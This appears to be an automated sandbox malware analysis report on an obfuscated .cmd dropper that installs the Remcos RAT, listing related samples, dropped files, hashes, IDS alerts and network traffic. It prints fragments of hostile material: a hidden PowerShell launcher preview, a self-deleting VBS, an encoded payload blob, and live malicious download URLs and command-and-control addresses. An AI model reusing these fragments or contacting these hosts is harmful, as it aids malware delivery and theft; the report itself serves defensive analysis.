                                                                                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.Win64.DropperX-gen.18606.18356.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            37f463bf4616ecd445d4a1937da06e19450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.155.139
                                                                                                                                            yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.67.155.139

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\remcos\logs.dat

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):234
                                                                                                                                            Entropy (8bit):3.3360892128027286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:rhlKlM+Xl8HWlRlfzNeDl5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojk5:6lj82lD855YcIeeDAlS1gWAAe5q1gWAv
                                                                                                                                            MD5:9386B1C4402A4A5BC1F3B75D06E8CD3C
                                                                                                                                            SHA1:A511C21F5D2E1619E557EFAEE5C903D4A1F77DCF
                                                                                                                                            SHA-256:BE9E30C21C21D0F7740687374E68C2FA9E0EA8E0898780F9BEDCCD9BF96832CF
                                                                                                                                            SHA-512:5F646E052763F29F601EC8A664951868D04FB67056B0BD646533E99F0CDC9AA4324BD53A818C3246DF97DD4A0605BDC74BFC4B07A9E9F0CB15B20087378446AB
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                            Preview:....[.2.0.2.4./.1.0./.2.1. .0.2.:.3.4.:.4.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):956
                                                                                                                                            Entropy (8bit):5.016616617248742
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:tkTLJend6UGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpSdVauKyGX85MEBZvXhNlT3/7l1DYro
                                                                                                                                            MD5:9220BE8AB34657C7535C5A2582857DC7
                                                                                                                                            SHA1:2BE54CB6D990A4F9C6D6AE30A618EAB88F181634
                                                                                                                                            SHA-256:0E97AB60A1FF8EECB241E186B7C690D4900E2922FBAE2125DA469EADEAAFD1F0
                                                                                                                                            SHA-512:23D31D1370AE2F5663F5957BA204BC16EA15E0B7F37669D55E3BB14B594FAAAA782E52926CED9E5D87E915910DF48945D57B7CC04CF44C3C7CE095EFB4D3BE01
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):8003
                                                                                                                                            Entropy (8bit):4.840877972214509
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                                                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                                                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                                                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                                                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhrkykzt.iy5.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf2hhutw.l1c.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z32uhnbf.ph5.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\bhvF678.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x57c24073, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20447232
                                                                                                                                            Entropy (8bit):1.284655157496756
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:9D0BuPOVAnljKhBfvUDv2R+YN5cksBNHfstOF:PyA5JDe+
                                                                                                                                            MD5:BA38B8694AF7EB45B3D706AB369DBF7B
                                                                                                                                            SHA1:2E7EE506DB940B674A99DCD5E3B132F69E2E0087
                                                                                                                                            SHA-256:7252D8C5770669E392ACC996122DB3DC16E0409C4E0CEE6762928420D03487E1
                                                                                                                                            SHA-512:AED7AA222722586C4F24A03259353480B0E4ACB6473A8F4FBD8CA1967A243A4678603279705659B97131510D24252A6C0807B75633000A1165EB709778295343
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:W.@s... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................?.X.....{5..........................{5..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\biljl.vbs

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):322
                                                                                                                                            Entropy (8bit):3.41606619423634
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgU9n+SkyGkRkJ7jlAan9YKJRB4y0aGH:xQ4lA2++ugypjBQMB3D9+UcSY9Z/0ait
                                                                                                                                            MD5:53E961FCBE2540B967EFCB5E6C3FD316
                                                                                                                                            SHA1:252BBD1E644FF0124E2039EEDE8A955D5405A98C
                                                                                                                                            SHA-256:F9A970482BAA86264FAEF6C210212B65901857DB17241D5C176B6789EE620F42
                                                                                                                                            SHA-512:5BBF4FDCBBB403B7E963A91D43AA425EBAC5CFAF6E81E592162B9D4D071150C8327F89922F719C25A5CC378AA1E82E043E1F9FEDA4D78D6F3CDCA9F8CDC73700
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\pvaqv

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2
                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..

                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6221
                                                                                                                                            Entropy (8bit):3.7352210811065576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jDe1f0LPr3C4U28Aj1ukvhkvklCywXmd+TxflRySogZo+eTxfl4ySogZo61:nM033CxHA4kvhkvCCtRTxfvH+TxfsHx
                                                                                                                                            MD5:5E420524CBC5E6DBC264C761309493CF
                                                                                                                                            SHA1:E55A3785E749D512D83442FCAE0DAC94BCAEF06F
                                                                                                                                            SHA-256:ACC6EE667F84A91C16F24E82FF6381E90BA1ED6EC8586F9153C4B59445AFDB7E
                                                                                                                                            SHA-512:3D7345E66515C3316DE85201E329F565AFEAFE6723271FB150594E956AAB36E5DCF526E2281E5F92C852D8984EF51178C41C939420E76268F212D0F68170488B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ...-/.v....t..4.#..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....T..0.#.....4.#......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^UY<4...........................%..A.p.p.D.a.t.a...B.V.1.....UY:4..Roaming.@......CW.^UY:4..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^UY=4..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................'..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^UY=4....Q...........

                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9CC0PCII26P6XS9DIN2.temp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6221
                                                                                                                                            Entropy (8bit):3.7352210811065576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jDe1f0LPr3C4U28Aj1ukvhkvklCywXmd+TxflRySogZo+eTxfl4ySogZo61:nM033CxHA4kvhkvCCtRTxfvH+TxfsHx
                                                                                                                                            MD5:5E420524CBC5E6DBC264C761309493CF
                                                                                                                                            SHA1:E55A3785E749D512D83442FCAE0DAC94BCAEF06F
                                                                                                                                            SHA-256:ACC6EE667F84A91C16F24E82FF6381E90BA1ED6EC8586F9153C4B59445AFDB7E
                                                                                                                                            SHA-512:3D7345E66515C3316DE85201E329F565AFEAFE6723271FB150594E956AAB36E5DCF526E2281E5F92C852D8984EF51178C41C939420E76268F212D0F68170488B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ...-/.v....t..4.#..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....T..0.#.....4.#......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^UY<4...........................%..A.p.p.D.a.t.a...B.V.1.....UY:4..Roaming.@......CW.^UY:4..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^UY=4..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................'..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^UY=4....Q...........

                                                                                                                                            C:\Users\user\AppData\Roaming\Rafting.Ans

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):436336
                                                                                                                                            Entropy (8bit):5.8484588848574
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:CMHa7ZB93AaROMWgvuh/eGV8EtKJg2DbS0mBliEfczyf7thB93k9I:Csa7F3rROMw/ehmKSOSTBlXcwJh33k9I
                                                                                                                                            MD5:CE429A8BB4D6FE008BB30E20337DAB1A
                                                                                                                                            SHA1:AAB03694AA2D8A456DD3FC03D7B1B76E6BCFBAD4
                                                                                                                                            SHA-256:2757CC9A4254063D89899EA0013B5D7F12C76F8C68C776AC6B00B8C135E53746
                                                                                                                                            SHA-512:FBB466962FCBCEFF06DAA0266C37C43D1A124AC991AEA0B7DD5FE6FB0F0D93BF2DFBFF48005E5F622F8A54F08E3F07B4000E898683FFCF1BC0249EC846EBB72D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:6wJcd+sClsO75lwRAHEBm+sCH9YDXCQEcQGb6wLo27m0ADeScQGb6wLPa4HxGHiVVXEBm+sC7kSBwVSHXThxAZvrAuMM6wK9gusCWeG6JCOBEesCvpxxAZtxAZtxAZsxynEBm+sCnXyJFAvrAhPxcQGb0eLrAn0I6wKzjYPBBOsCFgbrAuG+gfnalXsFfMrrAqxn6wLWlItEJATrAoqR6wKnOonD6wJqh3EBm4HDnmhCBHEBm3EBm7rbIHt6cQGbcQGbgfL6pTwscQGb6wJCn4HqIYVHVusCBQ7rAhuW6wIUtnEBm+sCVUFxAZuLDBDrAhe56wLJZYkME+sCvTjrApKDQusC2bHrAjCfgfokjAQAddJxAZtxAZuJXCQM6wKg+3EBm4HtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAi616wLAX4HDnAAAAHEBm3EBm1PrAn2c6wJzQWpAcQGb6wJyhInrcQGbcQGbx4MAAQAAAACQBesCnq3rAsIbgcMAAQAA6wI+8usCtqdT6wIpmOsCrvSJ6+sCiLBxAZuJuwQBAABxAZvrAp5QgcMEAQAA6wKpu3EBm1NxAZvrAscfav9xAZtxAZuDwgVxAZvrAowGMfbrAmh2cQGbMclxAZvrAlVZixrrAn4mcQGbQXEBm3EBmzkcCnX0cQGb6wLLxUbrAvBtcQGbgHwK+7h13usC+YdxAZuLRAr8cQGbcQGbKfBxAZvrAurl/9LrAq8dcQGbuiSMBADrAv1ycQGbMcDrAqcI6wKM64t8JAxxAZtxAZuBNAdRnPWx6wLKxusCpTqDwATrAguZ6wKeOznQdeLrAirOcQGbifvrAuiV6wLKwf/X6wIEyHEBm7mc9bFR+sxzChUQML3VWHFVHTH4+1zx5Nh5TPUO/rIwoFQJ2YkdNMAOyMswoHn37oz6zHvUVTL1XJxUU6dgdN1cnOznHELNXdDo+LGK+sQm0PD4sQJ2bThpXXRw

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:ASCII text, with very long lines (6138), with no line terminators
                                                                                                                                            Entropy (8bit):5.376413633232492
                                                                                                                                            TrID:
                                                                                                                                              File name:rIMG465244247443GULFORDEROpmagasinering.cmd
                                                                                                                                              File size:6'138 bytes
                                                                                                                                              MD5:d4a5745ec008932bec834b981d31bd8f
                                                                                                                                              SHA1:c57e44498a52b6aa60e55c19a16cb026104fa19c
                                                                                                                                              SHA256:40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216
                                                                                                                                              SHA512:7de89b88dbba6d2310ef79bad8bc6c82ec12b0e8c0abfc0229f3ca4765606c1c2f342cd996d63882e7e0aab4fd1f3d15d016108831e286d7e3aa26e09aef454f
                                                                                                                                              SSDEEP:96:zX+gBYcM44kNPsQa/+2bBRpgccIgEyHa9a6ONt/3nU56D+9EFA/W8v8OS7x+LSKv:T+gKc2k6Qa/cJJNd3n3wR+B1Kv
                                                                                                                                              TLSH:31C14A4D5A7D223C0D96C4186AA79F2F0F4449953C0CB5F3B039F1FE93C198A4A1C76A
                                                                                                                                              File Content Preview:start /min powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paede

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:9686878b929a9886

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-10-21T08:34:38.838096+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737172.67.155.139443TCP
                                                                                                                                              2024-10-21T08:34:49.174652+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449738185.236.203.10151525TCP
                                                                                                                                              2024-10-21T08:34:51.151958+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739185.236.203.10151525TCP
                                                                                                                                              2024-10-21T08:34:51.998973+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449740178.237.33.5080TCP
                                                                                                                                              2024-10-21T08:34:56.948809+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741185.236.203.10151525TCP
                                                                                                                                              2024-10-21T08:34:56.968527+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742185.236.203.10151525TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 21, 2024 08:34:01.467519999 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:01.467606068 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:01.467791080 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:01.476563931 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:01.476604939 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.102977991 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.103212118 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.106667042 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.106698036 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.107110023 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.118426085 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.159403086 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594151020 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594296932 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594363928 CEST49730443192.168.2.4172.67.155.139
